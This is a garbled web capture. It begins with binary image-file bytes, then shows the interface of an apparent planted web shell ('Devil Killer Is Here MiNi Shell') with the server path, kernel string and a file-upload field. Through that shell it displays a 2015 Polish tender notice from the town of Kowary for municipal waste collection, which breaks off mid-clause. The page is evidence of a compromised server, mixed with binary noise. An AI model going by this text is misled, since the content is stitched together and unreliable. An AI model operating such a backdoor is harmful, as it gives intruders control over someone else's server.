JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151006/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151006/146025-N-2015.html

<p class="kh_header"><b>Kowary: Odbiór odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych położonych na terenie Gminy Miejskiej Kowary</b><br>
<b>Numer ogłoszenia: 146025 - 2015; data zamieszczenia: 06.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Kowarach , ul. 1-go Maja 1a, 58-530 Kowary, woj. dolnośląskie, tel. 075 718-24-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kowary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych położonych na terenie Gminy Miejskiej Kowary.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja usługi odbierania odpadów komunalnych  od właścicieli nieruchomości zamieszkałych i niezamieszkałych na terenie Gminy Miejskiej Kowary. Usługa obejmuje załadunek, transport i przekazanie odpadów do unieszkodliwiania w Regionalnej Instalacji Przetwarzania Odpadów - Karkonoskie Centrum Gospodarki Odpadami Sp. z o.o., Bukowiec, ul. Robotnicza 6, 58-533 Mysłakowice. Przez nieruchomości niezamieszkałe należy rozumieć: szkoły, przedszkola, szpitale, domy opieki, instytucje, zakłady, punkty handlowe, cmentarze, boiska, place, ulice, przystanki autobusowe, ogrody działkowe, hotele, itp.
1. Odpady będą odbierane z terenu gminy Kowary, która liczy obecnie 8.320 mieszkańców, zamieszkujących Gminę Kowary.
2. Usługa odbierania odpadów komunalnych od wszystkich właścicieli nieruchomości zamieszkałych i niezamieszkałych położonych na terenie gminy Kowary, zgodnie                              z wykazem nieruchomości, w załączniku nr 12 do SIWZ,  obejmuje selektywny odbiór następujących frakcji odpadów:
a) odpady zmieszane (niesegregowane);
b) odpady ulegające biodegradacji,  w tym odpady kuchenne i zielone;
c) odpady z czyszczenia ulic i placów.
3. Odbiór w.w odpadów komunalnych z pojemników i worków na odpady komunalne,                         o pojemności i w kolorystyce określonej w obowiązującym Regulaminie utrzymania czystości i porządku na terenie Gminy Kowary - Uchwała Nr LIII.251.13 Rady Miejskiej w Kowarach z dnia 27 czerwca 2013 r., z częstotliwością określoną w tym Regulaminie oraz      w uchwale Nr LIII.250.13 Rady Miejskiej w Kowarach  z dnia 27 czerwca 2013 r. zmieniającej uchwałę w sprawie szczegółowego sposobu i zakresu świadczenia usług                     w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości                                                i zagospodarowania tych odpadów w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami.
4. Szacunkowa ilość wytworzonych odpadów komunalnych, którą należy odebrać i zagospodarować wynosi 1800 Mg.  Ilość wytwarzanych odpadów nie jest zależna od Zamawiającego. Za wykonanie usług objętych niniejszym postępowaniem przyjęta została forma wynagrodzenia ryczałtowego. Wynagrodzenie ryczałtowe Wykonawcy jest równe cenie oferty brutto tego Wykonawcy i będzie stałe, niezmienne w okresie realizacji umowy, za wyjątkiem urzędowej zmiany stawki podatku VAT. Do wyliczenia wysokości ceny ofertowej Wykonawca przyjmuje 1800 Mg odpadów komunalnych w okresie od 16 października 2015 r. do 31 maja 2016 r.
5. Odbiór raz w miesiącu zmieszanych odpadów komunalnych z miejsc wskazanych przez Zamawiającego w szacunkowej ilości 10 Mg.
6. Trasy zbiórki odpadów przebiegają po drogach wojewódzkich, powiatowych, gminnych a także wewnętrznych. Wykonawca winien posiadać pojazd umożliwiający poruszanie się po drogach o ograniczeniu tonażowym do 3,5 ton, z uwagi na teren podgórski - drogi prowadzą często po stromych, wąskich podjazdach. Szacunkowe długości tras zbiórki wynoszą:
Drogi wojewódzkie:

Lp.
Nazwa drogi 
Nr drogi


km
1
Kamiennogórska
367
14,6
2
Kowary - Karpacz
366
3,2
Długość ogółem
17,8
Drogi powiatowe:

Lp.
Nazwa drogi 
Nr drogi


km
1
Wojska Polskiego
2735D
2,33

Drogi gminne:

długość ogółem km
36,335

SUMA:
Długość dróg w km: 56,465

6. Do obowiązków Wykonawcy w szczególności należy:
1) Wykonywanie przedmiotu zamówienia zgodnie z obowiązującymi przepisami ustawy z dnia 27 kwietnia 2001 r.  prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150 z późn. zm.) oraz rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013, poz. 122),
2) Prowadzenie dokumentacji związanej z działalnością objętą zamówieniem, tj. sporządzanie półrocznych sprawozdań zawierających:
a) informacje o masie poszczególnych rodzajów odebranych odpadów komunalnych, w tym odpadów ulegających biodegradacji, oraz sposobie ich zagospodarowania, wraz ze wskazaniem instalacji, do których zostały przekazane odpady komunalne odebrane od właścicieli nieruchomości;
b) informacje o masie pozostałości z sortowania i pozostałości z mechaniczno-biologicznego przetwarzania, przeznaczonych do składowania powstałych z odebranych przez podmiot odpadów komunalnych.
c) w uzasadnionych wypadkach, na żądanie Zamawiającego, Wykonawca przedstawi dokumenty potwierdzające wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa, np. kopie dowodów dostarczania  odpadów do instalacji odzysku lub unieszkodliwiania, tj. karty ewidencji odpadów lub karty  przekazania odpadów. 
3) Raporty miesięczne - Wykonawca jest zobowiązany do przekazywania Zamawiającemu miesięcznych raportów zawierających co najmniej informacje o:
a) ilości odebranych odpadów zmieszanych (niesegregowanych) [Mg],
b) ilości odebranych odpadów ulegających biodegradacji, w tym odpadów kuchennych i zielonych (Mg),
c) ilości odebranych odpadów z czyszczenia ulic i placów (Mg),
d) nowych nieruchomościach objętych systemem odbioru odpadów komunalnych;
e) wskazanie właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób niezgodny z Regulaminem utrzymania czystości i porządku na terenie gminy Kowary,
f) adresach nieruchomości, na których powstają odpady komunalne, a nie ujętych w bazie danych prowadzonej przez Zamawiającego,
g) zapis GPS tras odbioru odpadów komunalnych (w formie elektronicznej).
Raporty, o których mowa wyżej muszą być przekazane w formie uzgodnionej                                 z Zamawiającym i będą podstawą do wystawienia przez Wykonawcę faktury za okres 1-miesięczny.
4) W zakresie częstotliwości i sposobu odbioru odpadów komunalnych:
Wykonawca będzie odbierał poszczególne rodzaje odpadów komunalnych z określoną częstotliwością i w sposób zgodny z obowiązującym Regulaminem utrzymania czystości i porządku na terenie Gminy Kowary oraz zapisami Uchwały Nr LIII.250.13 Rady Miejskiej w Kowarach z dnia 27 czerwca 2013 r. zmieniającej uchwałę w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę, przy czym ustala się, iż:
a) odpady komunalne zmieszanie (niesegregowane) - raz na tydzień;
b) odpady ulegające biodegradacji, w tym odpady kuchenne i zielone w okresie od                       1 kwietnia do 31 października - raz w tygodniu, a w pozostałych okresach raz na dwa tygodnie.
c) odpady komunalne z terenów przeznaczonych do użytku publicznego trzy razy w tygodniu,
d) odpady z czyszczenia ulic i placów w miesiącach listopad i od 1 marca do 31 maja - raz w tygodniu. Wykonawca zobowiązany jest do podstawienia kontenera we wskazane przez Zamawiającego miejsce do gromadzenia odpadów z czyszczenia ulic i placów.
5) W zakresie  dotyczącym  harmonogramu wywozu odpadów komunalnych:
a)  dokonywanie odbioru odpadów komunalnych z nieruchomości zgodnie z określonym przez Wykonawcę, w porozumieniu z Zamawiającym, harmonogramem,
b) przedstawienie przez Wykonawcę do zatwierdzenia Zamawiającemu projektu harmonogramu, nie później niż w ciągu 2 dni od podpisania umowy. Wszelkie zmiany harmonogramu wymagają formy pisemnej, za wyjątkiem zmian jednorazowych wynikających z nadzwyczajnych sytuacji, np. powódź, gwałtowne opady śniegu,  nieprzejezdna droga, dni ustawowo wolne. We wszystkich przypadkach zmiana harmonogramu nastąpi po, co najmniej ustnym, uzgodnieniu między stronami. Zmiana harmonogramu nie stanowi zmiany umowy,
c) uwzględnienie w harmonogramie wywozu odpadów stopnia napełnienia pojemników, względów sanitarnych  oraz potrzeb właścicieli nieruchomości,
d) uwzględnienie w harmonogramie wywozu odpadów odbioru odpadów z cmentarzy, ogródków działkowych i koszy ulicznych.
d) określenie w harmonogramie godzin, w jakich może się odbywać wywóz odpadów komunalnych, z podziałem na poszczególne ulice.

e) dostarczenie właścicielom nieruchomości harmonogramu odbierania odpadów komunalnych w trakcie pierwszego odbioru odpadów oraz informowanie mieszkańców                o zmianach terminów wywozów odpadów wynikających np. z przypadających dni ustawowo wolnych od pracy poprzez np. zamieszczenie informacji na stronach internetowych i słupach ogłoszeniowych. 
6) W zakresie transportu odpadów komunalnych:
a) zakaz mieszania selektywnie zebranych odpadów komunalnych, tj. odpadów ulegających biodegradacji ze zmieszanymi (niesegregowanymi) odpadami komunalnymi;
                              
b) zakaz odbioru odpadów w niedziele oraz dni ustawowo wolne od pracy. W przypadku, gdy dzień odbioru przypada w dzień ustawowo wolny od pracy, dniem odbioru odpadów są pierwsze dwa dni robocze następujące po dniu wolnym;

c) odbieranie, w wyjątkowych sytuacjach, na zgłoszenie Zamawiającego, np. telefoniczne, odpadów poza ustalonym harmonogramem, jeżeli odpady te zostaną zebrane i zgromadzone na nieruchomości w terminach innych niż przewiduje termin ich odbioru, a zagraża to bezpieczeństwu życia i zdrowia mieszkańców;

d) zabezpieczenie przewożonych odpadów przed wysypaniem na drogę.
7) W zakresie zagospodarowania odpadów:
a) przekazywanie odebranych od właścicieli nieruchomości zmieszanych (niesegregowanych) odpadów  komunalnych, odpadów ulegających biodegradacji w tym kuchennych i zielonych do regionalnych instalacji do przetwarzania odpadów komunalnych wynikających z Wojewódzkiego Planu Gospodarki Odpadami Komunalnymi, tj. Regionalnej Instalacji Przetwarzania Odpadów Komunalnych (RIPOK) prowadzonej przez Karkonoskie Centrum Gospodarki Odpadami Sp. z o.o. w Ścięgnach - Kostrzycy. W przypadku awarii instalacji regionalnej, o której mowa powyżej, bądź w stanach odbiegających od normalnych eksploatacji, dopuszcza się skierowanie strumienia odpadów do instalacji zastępczej, zgodnie z WPGO;

b) przekazywanie odebranych od właścicieli nieruchomości zamieszkałych i niezamieszkałych selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie z Wojewódzkim Planem Gospodarki Odpadami Komunalnymi.
7. Inne obowiązki wykonawcy:
1) wykonanie przedmiotu umowy w sposób fachowy, niepowodujący niepotrzebnych przeszkód oraz ograniczający niedogodności dla mieszkańców gminy Kowary do niezbędnego minimum;
2) zapewnienie, dla właściwej realizacji przedmiotu umowy, przez cały czas trwania umowy dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonanie zakresu rzeczowego usługi, w ilości co najmniej takiej, jak w złożonej w postępowaniu przetargowym ofercie;
3) porządkowanie terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z worków, pojemników, kontenerów i pojazdów w trakcie realizacji usługi wywozu, a także zebranie odpadów znajdujących się luzem obok pojemników;
4) garażowanie pojazdów do realizacji przedmiotu zamówienia wyłącznie na terenie posiadanej bazy magazynowo - transportowej;
5) wyposażenie własnych pracowników zajmujących się wywozem odpadów w odzież ochronną z widocznym logo firmy;
6) dokonywanie odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do terenów nieruchomości będzie utrudniony z powodu prowadzonych remontów dróg, objazdów itp. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy;
7) ponoszenie pełnej odpowiedzialności za należyte wykonanie powierzonych czynności zgodnie z obowiązującymi przepisami i normami;
8) okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonywanie przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa;
9) ponoszenie pełnej odpowiedzialności wobec  Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówień stanowiących nie więcej niż 30 % wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.31.00-7, 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie przed terminem składania ofert wadium w wysokości: 7000,00 zł  (słownie: siedem tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że posiada wpis do Rejestru Działalności Regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Miejskiej Kowary, prowadzonego przez Burmistrza Miasta Kowary</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali należycie w ciągu ostatnich 3 lat przed wszczęciem niniejszego zamówienia, a jeżeli okres prowadzenia jest krótszy - w tym okresie, co najmniej jednej usługi trwającej nieprzerwanie co najmniej 12 miesięcy, polegającej na odbiorze odpadów komunalnych z terenu nieruchomości zamieszkałych i/lub niezamieszkałych, na kwotę nie mniejszą niż 200.000,00 zł. wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować niezbędnymi do wykonania zamówienia narzędziami                            i urządzeniami spełniającymi co najmniej warunki określone w art. 9d.1 ustawy o zmianie ustawy o utrzymaniu czystości i porządku w gminach oraz niektórych innych ustaw z dnia  1 lipca 2011 roku w tym co najmniej: 
a) dwoma pojazdami przystosowanymi do odbierania odpadów komunalnych zmieszanych;
b) dwoma pojazdami przystosowanymi do odbioru selektywnie zebranych odpadów komunalnych;
c) jednym pojazdem do odbierania odpadów bez funkcji kompaktującej. 
Wszystkie ww. pojazdy muszą być w dyspozycji Wykonawcy, winny być trwale i czytelnie oznakowane (nazwa firmy, dane adresowe i numery telefonu), winny być zarejestrowane, posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu .  
d) bazą magazynowo - transportową usytuowaną w gminie, z terenu, której odbiera te odpady, lub w odległości nie większej niż 60 km od granicy tej gminy i na terenie, do którego posiada tytuł prawny.  Baza powinna spełniać warunki określone w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań z zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013 r. poz. 122)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożą oświadczenie o  spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają opłaconą polisę lub inny dokument ubezpieczenia potwierdzający, ze wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimum 200.000,00 zł wraz z dowodem uiszczenia należnych składek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Pełnomocnictwo wystawione dla osoby składającej ofertę podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika, 
b) Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów w zakresie wiedzy i doświadczenia oraz osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia, w sytuacji określonej w art. 26 ust. 2b ustawy, w przypadku kiedy Wykonawca powoła się na wiedzę i doświadczenie innego podmiotu, oświadczenie tego podmiotu zawierać winno zobowiązanie do udziału w wykonywaniu części udzielanego zamówienia w zakresie udostępnionego Wykonawcy potencjału.
c) Oświadczenie o dysponowaniu bazą transportowo - magazynową</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy o udzielenie zamówienia publicznego na realizację przedmiotowego zadania w zakresie terminu zakończenia w przypadku:
